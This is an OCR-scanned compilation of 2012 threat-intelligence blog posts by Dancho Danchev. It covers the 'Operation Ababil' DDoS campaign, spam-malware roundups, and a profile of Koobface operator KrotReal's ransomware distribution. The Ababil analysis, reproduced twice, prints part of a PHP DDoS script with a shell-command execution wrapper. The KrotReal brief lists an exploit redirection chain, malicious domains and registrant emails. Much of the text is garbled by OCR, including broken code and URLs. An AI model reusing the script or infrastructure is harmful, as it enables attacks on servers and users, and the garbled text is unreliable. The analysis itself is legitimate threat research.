08. [10]Spamvertised ‘US Airways reservation confirmation’ themed emails serve exploits 
and malware 


09. [11]Cybercriminals impersonate FDIC, serve client-side exploits and malware 
10. [12]Managed Ransomware-as-a-Service spotted in the wild 

11. [13]A peek inside a boutique cybercrime-friendly E-shop - part four 

12. [14]New E-shop selling stolen credit cards data spotted in the wild 

13. [15]From Russia with iPhone selling affiliate networks 


14. [16]New Russian DIY DDoS bot spotted in the wild 


This post has been reproduced from [17]Dancho Danchev’s blog. Follow him 
[18]on Twitter. 


1. http: //blog.webroot.com/ 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
3. 


http: //blog.webroot .com/2012/09/04/spamvertised-wire-transfer-confirmation-themed-emails-lead-to-black-ho 


le-exploit-kit/ 


4. http://blog.webroot.com/2012/09/05/intuit-themed-quickbooks-update-urgent- emails-lead-to-black-hole-explo 


ttp://blog. webroot .com/2012/09/06/cybercriminals-resume-spamvertising-bogus-greeeting-cards-serve-exploi 


s-and-malware/ 


http: //blog.webroot .com/2012/09/07/cybercriminals-abuse-skypes-sms-sending-feature-release-diy-sms-floode 


A 


o 


s/ 


7. http: //blog.webroot .com/2012/09/10/new-russian- service-sells-access-to-thousands- of-automatically-registe 


red-accounts/ 


8. http://blog. webroot. com/2012/09/14/spamvertised-your-fedex- invoice-is-ready-to-be-paid-now-themed-emails- 
lead-to-black-hole-exploit-kit/ 

9. http://blog.webroot .com/2012/09/17/new-russian-diy-sms-flooder-using-icqs-sms-sending-feature-spotted-in- 
he-wild/ 


10. ttp://blog.webroot . com/2012/09/18/spamvertised-us-airways-reservation-confirmation-themed-emails-serve 


exploits-and-malware/ 


11. http://blog. webroot .com/2012/09/19/cybercriminals-impersonate-fdic-serve-client-side-exploits-—and-malwa 
re/ 
12. http://blog. webroot .com/2012/09/20/managed-ransomware-as-a-service-spotted-in-the-wild/ 


13. http://blog. webroot .com/2012/09/21/a-peek-inside-a-boutique-cybercrime-friendly-e-shop-part-four/ 
14. http: //blog. webroot. com/2012/09/24/new-e- shop-selling-stolen-credit-cards-data-spotted-in-the-wild/ 
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ttp://blog.webroot .com/2012/09/27/from-russia-with-iphone-selling-affiliate-networks/ 


. http://blog.webroot .com/2012/09/28/new-russian-diy-ddos-bot-spotted-in-the-wild/ 
17. bttp://ddanchev.blogspot.com/ 
18. http://twitter .com/danchodanche 


8.10.2 Dissecting Operation Ababil’ - an OSINT Analysis - Part Two (2012-10-26 15:36) 


With more crowdsourced intelligence on "Operation Ababil" published in the recent weeks, it’s 
time to revisit the campaign’s core strategy for harnessing enough bandwidth to successfully 
take down major U.S financial institutions. 


As you can remember, in [1]Part One of the OSINT analysis for "Operation Ababil" | em- 
phasized on the crowdsourcing campaign launched by Izz ad-Din al-Qassam a.k.a Qassam 
Cyber Fighters, which led to the successful DDoS attack against these institutions. It appears 
that this is just one of the many stages of the campaign. 


According to security researchers from Proxelic, the attackers also relied on [2]a PHP based 
DDoS attack script known as "itsoknoproblembro" that was installed on servers susceptible to 
exploitation through the Bluestork Joomla template. By combining crowdsourced bandwidth 
and bandwidth from the compromised servers, the attackers managed to successfully achieve 
their objectives. 


The DDoS script in question,"itsoknoproblembro", has been publicly available as a down- 
load for months before the attacks started, indicating that it was not on purposely coded to 
be used in the campaign against major U.S financial institutions. 


PHP Code: 


<?php error_reporting (0); 

$base = dirname(_ FILE )."/"; 

function stoped() {cmdexec("killall -9 perl; 
killall -9 perl-bin; 

killall -9 perl-cgi; 


unlink ($base."start.php”); 
unlink ($base."£1.p1"); 
unlink ($base.”"run.p1”); 
unlink ($base.”"startphp.php”) ; 
print "<stopcleandos>Stop « Clean</stopcleandos>"; 
apache child terminate (); 
}function UploadFile($File) {cmdexec("killall -9 perl”); 
emdexec("killall -9 perl-bin”); 
emdexec("killall -9 perl-cgi"); 
target_path ="./"; 
target_path = $target path . basename( $File['name')); 
@move_uploaded_file($File['tmp_name'], $target_path) ; 
}function cmdexec ($cmd) {if (function _exists('system')) @system($cmd) ; 
elseif (function_exists('passthru') ) @passthru ($cmd) ; 
elseif (function_exists('shell_exec') ) @shell_exec (cmd) ; 
elseif (function_exists ("exec") ) @exec ($cmd) ; 
elseif (function_exists('popen') ) @popen ($cmd, "r") ; 
}function curPageURL() {SpageURL = 'http'; 
if (§_SERVER["HITPS"] == "on") {$pageURL .= "s"; 
}$pageURL .= "://"; 
if (& SERVER["SERVER_PORT”"] != "€0") {$pageURL .= §_SERVER["SERVER_NAME”).":".$ _SERVER["SERVER 
PORT™)] .§_SERVER("REQUEST_URI"]; 
J else {$pageURL .= §_SERVER("SERVER_NAME"] .$_SERVER["REQUEST_URI"]; 
}return $SpageURL; 


4039 


Detection rate: PHP DDoS.html - [3]MD5: 9ebab9f37f2b17529ccbhcdf9209891be - detected 
by 9 out of 44 antivirus scanners as PHP/Obfuscated.F; Heuristic.BehavesLike.JS.Suspicious.A 


Next to Prolexic’s claims, [4]th3j35t3r also published an analysis of the situation that’s 
primarily relying on wishful thinking and social engineering, claiming that Anonymous sup- 
plied the operators of "Operation Ababil" with DDoS bandwidth by using a service called 
Multiboot.me - 108.162.193.85; 108.162.193.185, AS13335. 


Sample screenshots of the Multiboom.me’s GUI: 


Alert: You only have 0 second(s) left of your subscription - cick mere to extend your account subscription 
Tools Booter Statistics 
References Image IP Grabber GeolP Lookup Status Ontne 

Total Users 42 

References list: a . 
Total Aftiacks 898 
Amacks running 0 
User Statistics 
Targets Atacked 
Latest Target None 
Last ontine 
Time let 00:00:00 

Attack iP Remove Selected Server Status 
Reference P ASS ONLINE 


Notes 


Add Reference 
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Alert: You only have 0 second(s) left of your subscription - click here to extend your account subscription 


Boot Booter Statistics 

® Lookup: Status Ontine 
Total Users 42 

ee Onaine now 1 

neneraW hanes 
Amtacks runneng 0 

Torget User Statistics 

Port: 80 JOP 


Targets Amacked 
Latest Target None 


Power: 50% 
Last onene 
Time let 00.00 00 
Tene: 0 hour(s) 1 minute(s) O seconds 
Server Status 
ASM ONUINE 
Attack IP 
Attack Slots 
CAID Target Poet Type Power Stop 


With "Operation Ababil" continuing to fuel political tensions between the U.S and Iran, which 
is blamed for organizing the launching these attacks, it’s worth emphasizing on the basics of 
[5]’false-flag’ cyber operations, and [6]"aggregate-and-forget" type of botnets. 


When was the first time you heard of Izz ad-Din al-Qassam a.k.a Qassam Cyber Fight- 
ers? Appreciate my rhetoric - right after they started their crowdsourcing campaign. With 
the group lacking any significant digital fingerprint prior to these attacks, virtually anyone 
can localize their objectives with a little twist of politics and propaganda, and easily set the 
foundations for what is now perceived as an Iranian cyber operation. 


Moreover, their bandwidth acquisition techniques clearly indicate that the attackers are 
aware of the dynamics of modern cyber operations in general, and by doing so, chose to 
acquire bandwidth without outsourcing their needs to ubiquitous and sophisticated [7]Russian 
DDoS on demand services, which could have led to the easy identification of the service in 
question, next to the cybercriminals behind it. 


Updates will be posted as soon as new intel becomes available. 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 


1. http: //ddanchev. blogspot .com/2012/09/dissecting-operation-ababil-osint.htm 


2. http://www.darkreading.com/advanced-threats/167901091/security/perimeter-security/240008534/serious-attac 


kers-paired-with-online-mob-in-bank-attacks.htm 


3. https://www.virustotal.com/file/3602c1600f47da49795b9dd7ed353beab37 399fbe6565f e4b558455b285b04ee/analysis/ 


1351213681/ 


4. http://webcache.googleusercontent .com/search?hl=enktbo=dkbiw=1366kbih=667&sclient=psy-ab&q=cache/3Ahttp/ 


A, 2F ,2F th3 j35t3r.wordpress.com/2F2012/,2F09/%2F26/,2Fanon 


ttp://www.zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 


5. 
6. http: //ddanchev. blogspot .com/2009/11/pricing-scheme-for-ddos-extortion. htm 


7. http://blog.webroot .com/2012/06/06/ddos-for-hire-services-offering-to-take-down-your-competitors-web-site 


s-going-mainstream/ 


8. http: //ddanchev. blogspot .com/ 
9. http: //twitter .com/danchodanche 


8.10.3 Dissecting Operation Ababil’ - an OSINT Analysis - Part Two (2012-10-26 15:36) 


With more crowdsourced intelligence on "Operation Ababil" published in the recent weeks, it’s 
time to revisit the campaign’s core strategy for harnessing enough bandwidth to successfully 
take down major U.S financial institutions. 


As you can remember, in [1]Part One of the OSINT analysis for "Operation Ababil" | em- 
phasized on the crowdsourcing campaign launched by I|zz ad-Din al-Qassam a.k.a Qassam 
Cyber Fighters, which led to the successful DDoS attack against these institutions. It appears 
that this is just one of the many stages of the campaign. 


According to security researchers from Proxelic, the attackers also relied on [2]a PHP based 
DDoS attack script known as "itsoknoproblembro" that was installed on servers susceptible to 
exploitation through the Bluestork Joomla template. By combining crowdsourced bandwidth 
and bandwidth from the compromised servers, the attackers managed to successfully achieve 
their objectives. 


The DDoS script in question,"itsoknoproblembro", has been publicly available as a down- 
load for months before the attacks started, indicating that it was not on purposely coded to 
be used in the campaign against major U.S financial institutions. 
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PHP Code: 


<?php error_reporting (0); 

$base = dirname(_ FILE )."/"; 

function stoped() {cmdexec("killall -9 perl; 

killall -9 perl-bin; 

killall -9 perl-cgi; 

bs 2 

unlink ($base.”"start.php"); 

unlink ($base."£1.p1"); 

unlink ($base.”run.p1”); 

unlink ($base."startphp.php”") ; 

print “<stopcleandos>Stop « Clean</stopcleandos>”; 

apache child terminate (); 

}function UploadFile($File) {cmdexec("killali -9 perl"); 
emdexec("killail -9 perl-bin"); 

emdexec("killail -9 perl-cgi"); 

$target_path ="./"; 

$target_path = $target path . basename( $File['name'])); 
@move_uploaded_file($File['tmp_name'], $target_path); 

}function cmdexec($cmd) {if (function _exists('system')) @system($cmd) ; 

elseif (function_exists('passthru') ) @passthru(Scmd) ; 

elseif (function_exists('shell_exec'))@shell_exec (cmd) ; 

elseif (function_exists('exec')) @exec ($cmd) ; 

elseif (function_exists('popen')) @popen ($cmd, "r") ; 

}function curPageURL() {SpageURL = 'http'; 

if (§$_SERVER["HITPS"] == "on") {$pageURL .= "s"; 

}$pageURL .= “"://"; 

if (& SERVER["SERVER_PORT”"] != "€0") {$pageURL .= §_SERVER["SERVER_NAME”).":".6 SERVER["SERVER 
PORT") .§_SERVER["REQUEST_URI")]; 

J else {$pageURL .= §_SERVER["SERVER_NAME"] .$_SERVER["REQUEST_URI"]; 
}return SpageURL; 
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Detection rate: PHP DDoS.html - [3]MD5: 9ebab9f37f2b17529ccbcdf9209891be - detected 
by 9 out of 44 antivirus scanners as PHP/Obfuscated.F; Heuristic.BehavesLike.JS.Suspicious.A 


Next to Prolexic’s claims, [4]th3j35t3r also published an analysis of the situation that’s 
primarily relying on wishful thinking and social engineering, claiming that Anonymous sup- 
plied the operators of "Operation Ababil" with DDoS bandwidth by using a service called 
Multiboot.me - 108.162.193.85; 108.162.193.185, AS13335. 


Sample screenshots of the Multiboom.me’s GUI: 
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Alert: You only have 0 second(s) left of your subscription - cick mere to extend your account subscription 


Tools 


References Image IP Grabber GeolP Lookup 


References list: 


Altack IP Remove Selected 


Reference P 


Notes 


Add Reference 


Booter Statistics 


Status 
Total Users 


Onane now 
Total Attacks 
Amacks running 


User Statistics 


Targets Atacked 
Latest Target 
Last onane 

Time fet 


Server Status 


42 


696 


00:00:00 
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Alert: You only have 0 second(s) left of your subscription - click here to extend your account subscription 


Boot Booter Statistics 
Lookup: Status Online 
Total Users 42 
LOOK-up Onane now 1 
Retna Adres 
Amacks running fe) 
Port: 80 UDP hd | 
Targets Amacked 
Latest Target None 
Power: 50% 
Last onane 
Tune let 00:00:00 
Tene: 0 hour(s) 1 minste(s) O seconds Server Status 
ASM ONLINE 
Attack IP 
Attack Slots 
CAID Target Port Type Power Stop 


With "Operation Ababil" continuing to fuel political tensions between the U.S and Iran, 
which is blamed for organizing the launching these attacks, it’s worth emphasizing on the 
basics of [5]’false-flag’ cyber operations, and [6]"aggregate-and-forget" type of botnets. 


When was the first time you heard of Izz ad-Din al-Qassam a.k.a Qassam Cyber Fight- 
ers? Appreciate my rhetoric - right after they started their crowdsourcing campaign. With 
the group lacking any significant digital fingerprint prior to these attacks, virtually anyone 
can localize their objectives with a little twist of politics and propaganda, and easily set the 
foundations for what is now perceived as an Iranian cyber operation. 


Moreover, their bandwidth acquisition techniques clearly indicate that the attackers are 
aware of the dynamics of modern cyber operations in general, and by doing so, chose to 
acquire bandwidth without outsourcing their needs to ubiquitous and sophisticated [7]Russian 
DDoS on demand services, which could have led to the easy identification of the service in 
question, next to the cybercriminals behind it. 
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Updates will be posted as soon as new intel becomes available. 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 


1. http: //ddanchev. blogspot .com/2012/09/dissecting-operation-ababil-osint.htm 


2. http://www.darkreading.com/advanced-threats/167901091/security/perimeter-security/240008534/serious-attac 


kers-paired-with-online-mob-in-bank-attacks.htm 


3. https://www.virustotal.com/file/3602c1600f47da49795b9dd7ed353beab37 399f be6565f e4b558455b285b04ee/analysis/ 


1351213681/ 


4. http://webcache.googleusercontent .com/search?hl=enktbo=dkbiw=1366&bih=667&sclient=psy-ab&q=cache/3Ahttp/ 


A/,2F ,2F th3 j35t3r .wordpress.com/2F2012/,2F09/2F26/2Fanon 


5. http: //www.zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 


6. http: //ddanchev. blogspot .com/2009/11/pricing-scheme-for-ddos-extortion. htm 


7. http: //blog. webroot .com/2012/06/06/ddos-for-hire-services-offering-to-take-down-your-competitors-web-site 
B.hetp:/ /adanchev blogspot coal 
o, hep: //ewitter .con/danchodanchod 
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8.11 November 


8.11.1 Summarizing ZDNet’s Zero Day Posts for October (2012-11-02 01:47) 


Z Net 


US Edition Windows iPad Cloud Networking Tablets Techlines Smartphones Security All Writers 


ZDNet / Blog Follow via: 5\ 
Zero Day PREVENTING STEALTHY THREATS 
. WITH NEXT-GENERATION SECURITY 


Seawity | Threats | Technology 


Ryan Naraine Latest Posts McAfee ePO Deep Command animation 


Ryan Naraine is a U.S. gov. accidentally publishes own short-URL ‘admin’ 
journalist and social API kev 
media enthusiast = 
specakzing in 

Internet and 


Days after the Go.USA.gov short-URL service's 
API became available to U.S. government 


tt . - ‘ 
computer security G l IS 4 employees, the department accidentally 
0.US. «GOV published the admin username and API key 


issues. 

allowing hackers to potentially create short 
URLs to phishing, scam or malware-nidden 
Dancho Danchev Be 
Dancho Danchev is an 

independent security 

consukant and cyber 

threats analyst, with 


extensive expenence 


in open source 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for October, 2012. 
You can subscribe to [2]Zero Day’s main feed , or follow me on Twitter: 


x 


01. [3]Report: Large US bank hit by 20 different crimeware families 
02. [4]Localized Dorkbot malware variant spreading across Skype 
03. [5]Sopelka botnet drops Citadel, Feodo, and Tatanga crimeware variants 


04. [6]Adobe patches 6 critical security flaws in Shockwave 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him 
[8]on Twitter. 


1. http://zdnet .com/blog/securit 
2. http://feeds.feedburner.com/zdnet/securit 
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. http: //www.zdnet .com/report-large-us-bank-hit-by-20-different-crimeware-families-7000005188/ 


ttp://www.zdnet .com/localized-dorkbot-malware-variant-spreading-across-skype-7000006021/ 
. http://www. zdnet .com/sopelka-botnet-drops-citadel-feodo-and-tatanga-crimeware-variants-7000006260/ 
. http://www.zdnet .com/adobe-patches-6-critical-security-flaws-in-shockwave-7000006272/ 


7. http://ddanchev. blogspot .com/ 
8. http: //twitter.com/danchodanche 


8.11.2 Summarizing Webroot’s Threat Blog Posts for October (2012-11-02 02:34) 


reat blog 


Home About the Bloggers Webroot.com RSS Feed 


BofA ‘Online Banking Passcode Reset’ fecoives 
Select Month [+] 
. - . . 
themed emails serve client-side exploits 
d | Referral Program 
an ma wa re Talk about a win win, 
November 1, 2012 - 12:00 am Free security for your 
WRAY O 3 Votes friends AND a donation 
to charity 
By Dancho Danchev 
Cybercriminals are currently mass mailing millions of emails, in an attempt to trick Bank of America Free tools 
customers into clicking on the exploit and malware-serving link found in the spamvertised email. Relying Haven't tned Webroot 
on bogus “Online Banking Passcode Changed” notifications and professionally looking emai templates, SecureAnywhwere to 
the campaign ts the latest indication of the systematic rotation of impersonated brands in an attempt to remove an infection? 
cover as many market segments as possible Download a free trial 
More details: Webroot 
SecureAnywhere 
Read More » program/malware 
assistance? 
Tell your friends: Hj Facebook s [Ej Twitter ts GE) Digg «5 React EG StumdieUpon [ij Email Open a support ticket 
Concerned about a 
4 . 5e the first to like th: 
Like this: * Like Be the first to like this specific URL or IP? 
By ddanchev | Posted in Botnet activity, Downloaders, Exploits, malware, social engineering, spam, Threat Research, Trojans | Tags Check the reputation of 
Bank of America, Black Hole Exploit Kit, BofA, Client-Side Exploits, cybercrime, Exploits, Malicious Software, malware, security, social @ URL or IP address 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for October, 
2012. You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


x 


01. [3]Russian cybercriminals release new DIY SMS flooder 
02. [4]Upcoming Webroot presentation on Cyber Jihad and Cyberterrorism at RSA Europe 2012 


03. [5]Recently launched E-shop sells access to hundreds of hacked PayPal accounts 
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04. [6]New Russian service sells access to compromised Steam accounts 


05. [7]‘Vodafone Europe: Your Account Balance’ themed emails serve malware 


06. [8]Cybercriminals impersonate UPS, serve client-side exploits and malware 


07. [9]‘Your video may have illegal content’ themed emails serve malware 


08. [10]Cybercriminals spamvertise ‘Amazon Shipping Confirmation’ themed emails, serve 
client-side exploits and malware 


09. [11]American Airlines themed emails lead to the Black Hole Exploit Kit 


10. [12]Bogus Facebook notifications lead to malware 


11. [13]Spamvertised ‘KLM E-ticket’ themed emails serve malware 


12. [14]‘Intuit Payroll Confirmation inquiry’ themed emails lead to the Black Hole exploit kit 


13. [15]Malware campaign spreading via Facebook direct messages spotted in the wild 


14. [16]‘Regarding your Friendster password’ themed emails lead to Black Hole exploit kit 


15. [17]Russian cybercriminals release new DIY DDoS malware loader 


16. [18]PayPal ‘Notification of payment received’ themed emails serve malware 


17. [19]Cybercriminals impersonate Delta Airlines, serve malware 


18. [20]‘Your UPS Invoice is Ready’ themed emails serve malware 


19. [21]Bogus Skype ‘Password successfully changed’ notifications lead to malware 


20. [22]RSA Conference Europe 2012 - recap 


21. [23]Cybercriminals impersonate Verizon Wireless, serve client-side exploits and malware 


22. [24]Spamvertised ‘BT Business Direct Order’ themed emails lead to malware 


23. [25]Cybercriminals spamvertise millions of British Airways themed e-ticket receipts, serve 
malware 
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24. [26]Cybercriminals spamvertise millions of bogus Facebook notifications, serve malware 


25. [27]Nuclear Exploit Pack goes 2.0 


This post has been reproduced from [28]Dancho Danchev’s blog. Follow him 
[29]on Twitter. 


1. http: //blog.webroot.com/ 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 


3. http://blog.webroot .com/2012/10/01/russian-cybercriminals-release-new-diy-sms-flooder/ 
4. http://blog.webroot .com/2012/10/08/upcoming- webroot-presentation-on-cyber- jihad-and-cyberterrorism-at-rsa 


europe-2012/ 


5. http://blog. webroot. com/2012/10/12/recently-launched-e-shop-sells-access-to-hundreds-of-hacked-paypal-acc 


.webroot .com/2012/10/12/new-russian-service-sells-access-to-compromised-steam-accounts/ 
webroot .com/2012/10/15/vodafone- europe-your-account-balance-themed-emails-serve-malware/ 
. webroot .com/2012/10/15/cybercriminals- impersonate-ups-serve-client-side-exploits-and-malware/ 


. webroot .com/2012/10/16/your-video-may-have-illegal-content-themed-emails-serve-malware/ 


. http: //blog.webroot.com/2012/10/22/russian-cybercriminals-release-new-diy-ddos-malware-loader/ 
. http: //blog. webroot. com/2012/10/23/paypal-notification-of-payment-received-themed-emails-serve-malware/ 
. http: //blog. webroot .com/2012/10/24/cybercriminals-impersonate-delta-airlines-serve-malware/ 


. http: //blog.webroot .com/2012/10/25/your-ups- invoice-is-ready-themed-emails-serve-malware/ 


21. http://blog.webroot .com/2012/10/26/bogus-skype-password-successfully-changed-notifications-lead-to-mal 


22. http://blog.webroot .com/2012/10/26/rsa-conference-europe-2012-recap/ 


23. http://blog.webroot .com/2012/10/27/cybercriminals-impersonate-verizon-wireless-serve-client-side-exploi 


s-and-malware/ 


24. http://blog.webroot.com/2012/10/28/spamvertised-bt-business-direct-order-themed-emails-lead-to-malware/ 


25. http://blog.webroot .com/2012/10/29/cybercriminals-spamvertise-millions-of-british-airways-themed-e-tick 


26. ttp://blog.webroot .com/2012/10/30/cybercriminals-spamvertise-millions-of-bogus-facebook-notifications-— 
27. 

28. 

29. 
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8.11.3 Managed Embedding of Malicious iFrames Through Compromised Accounts 
as a Service (2012-11-24 00:55) 


a 


This post has been reproduced from [1]Dancho Danchev’s blog. Follow him 
[2]Jon Twitter. 


1. http://ddanchev. blogspot .com/ 
2. http://twitter.com/danchodanche 


8.11.4 Koobface Botnet Master KrotReal Back in Business, Distributes Ransomware 
And Promotes BHSEO Service/Product (2012-11-26 03:52) 


On January 09, 2012 | exposed [1]Koobface botnet master KrotReal. On January 16, 2012, 
[2]The New York Times went public with data from Facebook Inc. exposing the identities 
of the rest of the group. What happened? With the botnet masters still at large, and the 
Koobface botnet currently offline, a logical question emerges - what are these cybercriminals 
up to now that they’re no longer involved in managing Koobface? 


Cybercrime as usual! 


Continuing to [3]squeeze the cybercrime ecosystem, and keep known bad actors on a 
short leash, in this intelligence brief I'll expose [4]Anton Nikolaevich Korotchenko a.k.a 
KrotReal’s s latest activities, indicating that he’s currently busy experimenting with two 
projects: 


¢ A Black Hat (SEO) Search Engine Optimization related service/product 


¢ Underground traffic exchange/pay-pay-install network currently distributing localized Ran- 
somware 


Just like the case when KrotReal’s real life identity was revealed due to a single mistake he 
made over a period of several years, namely to register a Koobface command and control 
server using his personal GMail account, in this intelligence brief I’ll once again expose his 
malicious and fraudulent activities by profiling two of the most recently domains he once 
again registered with his personal GMail account. 


Let’s start by profiling his Black Hat SEO service/product, currently hosted on one of the 
domains he registered in 2011. 


trafficconverterin - 176.9.146.78 - Email: krotreal@gmail.com 
Created On:28-Jul-2011 12:37:45 UTC 

Last Updated On:28-Jun-2012 08:11:43 UTC 

Expiration Date:28-Jul-2013 12:37:45 UTC 
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The service/produce apparently allows the systematic abuse of legitimate blogging platforms 
such as Google’s Blogger and Wordpress, next to Yoom CMS. KrotReal himself might be using 
the tool, or sell/offer access to it as a managed service. Does this mean he’s not using it by 
himself to monetize the hijacked legitimate traffic that he’s able to obtain through his Black 


Capabilities 
Using an external domain 
Disk Space 
Edit the template / css 
Access to the Sitemap and Robots.txt 
Support for meta tags 
Support categories 
Import xml 
Backup and Export Template 
Built-in hosting for images 
Lack of reference to developer 
Multi-user access 
Built-in statistics 


Russian-language technical support 


Result 


Hat SEO campaigns? Not at all. 


More domains presumably to be used for Black Hat SEO purposes registered with KrotReal’s 


Blogger 
v 
x 
~v 
x 
partially 
partially 
~ 
~ 
Google Picasa 
~ 
partially 
~ 


a 


personal email account (krotreal@gmail.com): 
superstarfind.com 
celeb-search.com 
myown-search.com 
myfindstuff.com 
network-find.com 
coolfind200309.com 
experimentsearch.com 
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Yoom CMS 


A 


0 


Partially 


~v 


~v 


~v 


21 


Wordpress 
limited 
limited 
limited 
limited 

~ 
~ 
limited 


partially 


partially 

partially 
0 

limited 


16 


fashion-overview.com 
krotpong.com 
adultpartypics.com 
findhunt.com 


How is he actually monetizing the hijacked traffic? Keep reading. Now it’s time to ex- 
pose his malicious activities in the form of spreading localized Ransomware variants. For 
the record, [5]the Koobface gang distributed primarly scareware - there’s evidence that the 
group was also involved in other [6]malicious campaigns - and even [7]bragged about the 
fact that they’re not damaging infected user PCs. 


What’s particularly interesting about profiling this campaign, is that it’s a great example 
of double-layer monetization, as KrotReal is earning revenue through the Traffic Holder Adult 
Affiliate Program, in between serving client-side exploits and ultimately dropping Ransomware 
on the affected host using the same redirection chain. 


adultpartypics.com 


allcelebrity.ru A NET 176.9.0.0/16 AS. as24940 


A = 
* a canis PTR 


traffictrackerin Static.78.146.9.176.clients your-server.de 


www.allcelebrity.ru 


Sample malicious domain name reconnaissance: 

traffictracker.in - 176.9.146.78 (AS24940) - Email: krotreal@gmail.com 
Created On:22-Nov-2011 13:42:53 UTC 

Last Updated On:22-Nov-2012 22:33:25 UTC 

Expiration Date:22-Nov-2013 13:42:53 UTC 


Responding to the same IP 176.9.146.78 (AS24940): 
allcelebrity.ru 
easypereezd.ru 


Sample malicious’ activity redirection chain: hxxp://traffictracker.in/in.cgi?11 
&parameter=nude-+girls &CS=] -> hxxp://celeb-search.com/in.php?source=th 
&g=nude-+girls -> hxxp://celeb-search.com/in3.php?source=th &q=nude-+girls 
-> hxxp://www. trafficholder.com/in/in2. php ?ppillow-pics _erotic -> 
hxxp://hit.trafficholder.com/cgi-bin/traffic/process.fcgi?a=ppillow &c=1 &n=pics _erotic 
&r= ->  hxxp://gravityexp.com/go.php?sid=12 ->  hxxp://nosnowfevere.com/ZqRqk 
(exploiting [8]CVE-2008-5353) -> hxxp://nosnowfevere.com/oxsXAE?KpDzQ=61 
-> hxxp://nosnowfevere.com/ZqRqk -> hxxp://nosnowfevere.com/EHSvFc -> 
hxxp://nosnowfevere.com/XMDrkH 


KrotReal’s Traffic Holder Adult Affiliate Network ID is ppillow-pics erotic. 
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rr 
<<) Traffic Holder 


Serving Industry Professionals Bovideide 


Plnemoeif]occcomty strona? OS 
Available Traffic 


Buy Traffic 


Register Now 
ae), PE 


Sell Traffic 


Affiliate Program 
Testing System 


Traffic Holder renders internet marketing services for adult webmasters since 2006. 
We provide quality clicked edut traffic for sdut end norsdst websites. Ou primary 
geal is te secure macenen esrnings for traffic sellers and most sdverisgens terms 
for tesffic Duyers. Our sdvertizing pistfor: ic powered with oc sxderce of over 500 
rrllion mortity users. We offer uteststle prices on equal quality trafic. 


PayPal GIOIRECT Pa) 


& 
= eBvsE © oo 


Traffic Holder now provides FREE traffic to its TOP traffic Sellers. 


Z » Every Monday we send — geo-fitered niche traffic to cur TOP 10 selling domains for free. That means: 
a * fe) the more traffic you sell with us - the more hits you get back (so that you earn and make your resource grow 
at the same time). 
. Click here 
(7 to leave If you would like to partipicate in this offer, you just need to send as much traffic as you can to be published 
a a message in the TOP 10 lst. If your domain is published - you get free traffic to your site this week. 
Please be aware: You have no ability to monetize Free Traffic Back bonus or send it to another URL. 
z The TOP 10 list is published at the following URL: hmpi//trafficholder.comytop. hem! 
Live Chat oy Lvererson 
RRRRe 
read all news... 
Sand “ 
4 How to get started System Stats Main Features 
Hits received last 24 hours: 26,600,671 J Instant Deposits & Instant Withdrawals 
i 4 20,509, : 
A its aaa mk hours: a 500 J Geo Filtration for any niche/type 
oT You may purchase traffic to adult and non-eduk 
Top 5 niches: Top 5 Sellers: websites 


Malicious domain names reconnaissance: 

gravityexp.com - returns "Digital River GmbH" on its home page - 46.163.117.144 - Email: 
francesca.muglia.130@istruzione. it 

Updated Date: 30-aug-2012 

Creation Date: 30-aug-2012 

Expiration Date: 30-aug-2013 


nosnowfevere.com - 91.211.119.32 - Email: djbroning@definefm.com 
Updated Date: 25-nov-2012 

Creation Date: 25-nov-2012 

Expiration Date: 25-nov-2013 


Upon successful client-side exploitation, the campaign drops [9]MD5: 
d234a238eb8686d08cd4e0b8b705dal4 - detected by 10 out of 43 antivirus scanners as 
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Trojan.Winlock.7431 


Sample screenshot displayed to users from geolocated countries: 


TY 


bet —— 


Your PC is blocked due to at least one of the reasons specified below. hor 


REVIEW THE VIOLATION(S) BELOW, AND FOLLOW INSTRUCTIONS TO COMPLYT 


Your have sccessed and/or distr® 


Ctsuse 5 of the United Stat 


Artk 


years 


You have viewed or dis 
§2252 of the Us 
§ 


$2252) 


legal access has been inétisted 


on Neglect Use of Personal Computer, Article 290 of the Criminal Code pro 


nine years 


Pursuant to the affirmative defense sections in the above laws, os well a3 9 possibility of mahware/rirus infection on 


violetion|s) above, there t a tems 
under the above statues 


Keep in mind, that 9 repeat offence wil be prosecuted to the full extent of the low, If neglect is proven in co 


Ou computer 


To unlock the computer, you must pay the fine through Moneypak of 2005 


Now de I unkeck computer using MoneyPak? 


Ges’ 


pay the fine, your PC w 


tend the 


Enter the MoneyPak code 


Enter the code Morey Pak, 


To enter a code, use the virtual keyboard 


uted Mega! copyrighted materta’ 


he Criminal ¢ 


ode. It is s federal crime to knowingly p 


>orary ammendment in effect, which allows the payment of fine in the amount of $200 for off first-time offen 


inst unsuthy y matware/virus, you may stil be charged with 


TED NOT LATER THAN 
THE US DEPARTMENT 


HOURS AFTER T! 


RWARDED T 


° ia 


are sold. They are usualy 
A 4.95 tee wil be added by the retailer 


of the MoneyPsk card in the window below, one « 


al retail location where the 
d to the cashier and load the card 
digits under the scratch-off sect 


get unlocked in ft to 48 hours after the money is put into the State sccount. In case an error o 
ode by emali tine@fbi gov (Do not forget to specify IP address } 


and are in direct violation of the intellectual Property Clause, Article |, Section S, 


om your PC without your knowledge or consent, your PC may be infected by malware, thut you ore violating the law 


ses for 2 tine of 000 and for 


urt for mot using adequate meant 


ove 


0 PAYMENT I'S RECEIVED IN THIS TIMEFRAME, ALL 
IN CRUWIMAL PROCEEDING 


MOCK, IF 


2d in the prepaid section 


git at & tine. 


Where can | buy a MoneyPak? 


od the card at & 


re ls 


You can buy and & pRarmacte: and ret 
MoneyPek bi avaliable at the below locations, For 2 full let, please ait the 
wetone 


Walmart >\< cvspnermecr MK 


Uhehpeeans 


Second screenshot of a sample page displayed to affected U.K users: 


eprivation of therty for four 


our system, which has led to the 


. youll have to 
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K ‘) } International Police Association - [AC 


international Administration Center 


7} Sha - 
Al actnty of this computer has been recorded If you use webcam videos Pleas follow the instruction on the right Bz) 


and pectures were saved foe sdennficanon webcam Ukash code [ *| 


om, __o @ Okash sooysoe 


o « 
22 


